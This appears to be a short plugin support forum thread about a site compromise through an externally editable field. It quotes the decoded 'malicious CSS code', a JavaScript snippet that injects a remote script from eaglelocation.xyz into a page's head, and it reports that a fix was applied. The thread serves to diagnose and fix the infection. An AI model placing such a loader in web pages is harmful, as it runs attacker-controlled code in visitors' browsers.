mathijsv

We don’t allow the disclosure of vulnerabilities here. If you wish to know more, please contact the author directly.

Fair point, sorry!

Proposed solution works.

The malicious CSS code translates to:

var d = document.createElement('script');
d.async=true;
d.src='https://eaglelocation.xyz/stats.js';
d.type='text/javascript';
document.getElementsByTagName("head")[0].appendChild(d);

@sanjaydabhoya Any idea why this field was editable from the outside?

• This reply was modified 5 years, 6 months ago by mathijsv.

Thanks for fixing!